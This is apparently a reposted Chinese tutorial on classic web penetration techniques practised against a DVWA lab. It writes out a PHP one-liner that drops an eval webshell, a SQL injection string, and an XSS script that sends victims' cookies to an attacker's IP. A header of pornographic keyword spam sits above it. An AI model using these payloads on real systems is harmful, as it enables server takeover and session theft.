日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

网络安全2:各种经典渗透方式合集

發布時間:2023/12/20 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 网络安全2:各种经典渗透方式合集 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

實驗環境是 kali+owasp靶機+win10

強烈建議kali下載2018版的,不要下載新版的,新版的刪除了很多軟件。

文件上傳漏洞

文件包含

有一些主頁的php代買中包含了 include *,當上傳了一些包含能夠生成webshell(一句話木馬)的文件后,由index.php自動執行,生成木馬。

本地文件包含漏洞

1 向圖片中添加一句話病毒

<?fputs(fopen("shell20.php","w"),'<?php eval($_POST[qt]);?>')?>

2. 使用owasp靶機上的dvwa頁面上傳帶有病毒代碼的圖片

3. 使用中國菜刀控制服務器

遠程文件包含

這種方式是利用服務器訪問遠程服務器中的文件(包含一句木馬生成代碼),用于在服務器中生成一句代碼的shell

1 在遠程服務器(kali)中創建文件

?2 記住文件在遠程服務器中的地址,和ip地址

在dvwa中用http://ip地址/文件名代替include

執行

3 利用中國菜刀控制服務器。

sql注入

  • 對于web應用程序而言,用戶核心數據存儲在數據庫中,例如MySQL、SQL Server、Oracle;
  • 通過SQL注入攻擊,可以獲取、修改、刪除數據庫信息,并且通過提權來控制web服務器等其他操作;
  • SQL注入即攻擊者通過構造特殊的SQL語句,入侵目標系統,致使后臺數據庫泄露數據的過程;

搜索框的數據會傳入‘$id’的位置,一般情況下只能輸入數字,查找數字所對應的用戶的信息。

可以使用union的方式來實現查找其他數據庫。

需要注意的是,union前后的select的字段數需要是一致的,因此

1.需要知道search處的sql語句有幾個字段?

2.需要知道union后面selct的字段名稱

使用information.schema中的信息,其中TABLES表中記錄的是mysql中所有的表的信息,column存儲所有列的信息。

3 手動注入

基于布爾的注入

search處的sql為:

SELECT first_name, last_name FROM users WHERE user_id = '$id'

$id處應該是id名稱,但是如果輸入處改為

select FIRST_NAME,LAST_NAME from users WHERE user_id = '' or 1=1 --'';

則可以查詢表中所有信息

4??union 注入

?通過上面的方法可以獲得當前所在數據庫(好像沒啥大用)

通過上述方式可以獲得數據庫中表中列的名稱,為后續獲得數據做準備。

或得列名以后,需要注意的是,union前后的字段數量要保持一致,當后面字段很多時,可以用concat來合并多個字段。

?5 盲注

當網頁搜索對輸入的錯誤內容不提示相關信息時,需要使用盲注 sleep(5),通過延長返回結果的時間來查看是否能夠使用sql注入。

6 sqlmap 自動注入

XSS跨站腳本攻擊

最主流攻擊方式

1.xss releccted 反射型

把腳本放在鏈接里,用戶點擊鏈接后,被盜取相關信息。

2.xss stored 存儲型

把腳本放在服務器,用戶瀏覽網站就會執行腳本,被盜取信息?。

首先使用kali啟動阿帕奇服務器

systemctl restart apache2

然后編寫一段php腳本用于用戶通過xss跨站腳本訪問,目的是保存網站的cookie

?

?最后向網站注入腳本

<script> window.open('http://192.168.137.131/cookie_rec.php?cookie='+document.cookie)</script>

當用戶訪問該頁面時,就會執行腳本后,訪問在服務器上的script文件,獲得cookie

無論是哪種,都需要使用到script腳本語言

?3 beef 自動化攻擊

使用kaili beef插件實現xss跨站腳本,不用進行配置

使用example在網站漏洞點進行注入,使用用戶進行訪問

可以在web ui界面進行查看被攻擊用戶,并可以進行相關操作。?

web信息收集-搜索引擎

google:在進行滲透測試之前,首先要利用一些途徑來搜索對象的一些信息,google搜索就可以很好的實現這些功能

1 site: 只在指定網站進行搜索

2 filetype:pdf/ppt/ "文件名"?

搜索pdf文件

?3 urlin:php?id=

網址中pip?id的網址(可能的注入點)

4 intitle:后臺登陸

網頁名稱叫后臺登陸的網頁(可能的注入點)

intitle:index of "parent directory" 父級目錄

5 搜索某個框架來構建的網站

shodan引擎-最可怕的搜索引擎,掃碼互聯網內包括各種硬件信息在內的各種信息

比如:ip 搜索,服務器所在國家,服務器類型,協議類型

zoomeye鐘馗之眼 國內shodan?

同樣可以獲得網絡設備的指紋

web信息收集-目標掃描工具

nmap可以獲得網站的各種指紋信息

nmap使用教程_weixin_30372371的博客-CSDN博客

漏洞掃描-awvs? -appscan? -burp suite

這些軟件都可以對上述的漏洞進行掃描,并生成報告。

SSH密碼暴力破解 海德拉密碼

海德拉是一塊密碼破解工具,可以通過設置用戶名字典,密碼字典的方式,對指定ip地址的各種服務(ftp,郵箱,ssh等)進行密碼破解工作。

?但是海德拉好像不存在設置線程的功能,破解速度比較慢

美杜莎,跟海德拉差不多,但是可以設置線程

?-t 設置線程數?

BrutesPray

集成nmap和美杜莎,使用nmap對服務器進行指紋信息搜索,美杜莎進行破解

首先使用nmap查看網段下已經啟動的服務器,保存成xml文件,然后對這些服務器進行破解

MSF框架

啟動 msfconsole

枚舉賬號模式

密碼破解防御

ARP協議實現中間人攻擊

????????基于arp協議,當主機1要訪問其他主機時,主機1會廣播尋找主機的ip地址,此時攻擊機針對主機1會偽裝成路由器,針對路由器會偽裝成主機1,此時信息會通過攻擊機。

? ? ? ? 針對客戶機:為了防止中間人攻擊,可以把路由器的地址變成靜態地址

? ? ? ? 針對服務器:使用https加密機制

總結

以上是生活随笔為你收集整理的网络安全2:各种经典渗透方式合集的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。